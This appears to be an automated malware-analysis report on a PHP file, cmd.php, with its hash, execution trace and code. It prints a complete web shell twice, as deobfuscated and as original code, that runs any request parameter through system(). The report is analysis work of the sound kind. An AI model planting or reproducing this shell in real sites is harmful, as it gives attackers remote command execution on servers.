PHP Malware Analysis

cmd.php

md5: b7a7205d221293f24a608f1a1bb0d7a4

Jump to:

Screenshot


Attributes

Execution


Deobfuscated PHP code

<?php

if (isset($_REQUEST["cmd"])) {
    echo "<pre>";
    $cmd = $_REQUEST["cmd"];
    system($cmd);
    echo "</pre>";
    die;
}

Execution traces

data/traces/b7a7205d221293f24a608f1a1bb0d7a4_trace-1676238708.1563.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:52:14.054184]
1	0	1	0.000250	393512
1	3	0	0.000318	394592	{main}	1		/var/www/html/uploads/cmd.php	0	0
1	3	1	0.000339	394592
			0.000373	314224
TRACE END   [2023-02-12 19:52:14.054356]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php if(isset($_REQUEST["cmd"])){ echo "<pre>"; $cmd = ($_REQUEST["cmd"]); system($cmd); echo "</pre>"; die; }?>